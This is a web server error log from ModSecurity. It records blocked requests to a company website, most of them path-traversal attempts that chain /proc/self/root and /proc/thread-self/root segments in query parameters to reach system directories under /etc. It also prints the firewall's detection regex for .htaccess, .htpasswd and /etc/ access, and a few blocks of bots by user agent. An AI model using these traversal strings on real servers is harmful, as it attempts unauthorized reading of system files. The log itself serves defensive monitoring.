[Mon Mar 16 10:47:34.091680 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:44358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJ9o6lpbStxTqkSktiqwAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:47:38.719493 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:44012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJ-v9ocpUE4ed4uDziXgAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:47:40.018712 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:36598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJ_P9ocpUE4ed4uDziXwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:47:42.306511 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:36602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJ_o6lpbStxTqkSktirQAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:47:44.659307 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:36606] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKAI6lpbStxTqkSktirwAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:48:11.064768 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.241.46:36610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKGxXjF1vJNtV6CWrtkwAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:48:18.419789 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.243.203:34494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKInbQATo66fKoS7xCngAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:48:27.812232 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.244.31:33398] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgKK46lpbStxTqkSktitgAAAkM"]
[Mon Mar 16 10:49:04.195303 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:59542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKTrABkC4fWIHEf8HgwAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:49:05.563175 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:50796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKUZqj1wV0Si-OkeffegAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:49:23.907616 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:43548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKY_9ocpUE4ed4uDzirgAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:49:30.199814 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:52558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKarABkC4fWIHEf8Hg0AAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:49:40.225697 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:50812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKdNSswJuvopo3lOhUwAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:49:44.751823 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.243.203:33928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKeBXjF1vJNtV6CWrtoQAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:49:50.259595 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:33932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKfrysWC90G-1nBrA6UQAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:50:30.239825 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:50974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKprABkC4fWIHEf8HhBgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:50:31.599562 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.241.46:35004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKpwlT9VtDQc7bgUyhowAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:50:35.019913 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:35018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKq7ysWC90G-1nBrA6WQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:50:36.338718 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:35032] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKrLABkC4fWIHEf8HhCQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:50:47.187815 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:35036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKt9SswJuvopo3lOhUzwAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:50:49.790535 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:56744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgKuY6lpbStxTqkSktiyQAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:51:02.295720 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.228.16:48200] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgKxrysWC90G-1nBrA6XwAAAYw"]
[Mon Mar 16 10:53:30.390352 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.244.31:33636] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgLWrysWC90G-1nBrA6cAAAAZQ"]
[Mon Mar 16 10:54:50.057293 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:44036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgLqnbQATo66fKoS7xDYgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:54:53.447592 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:34936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 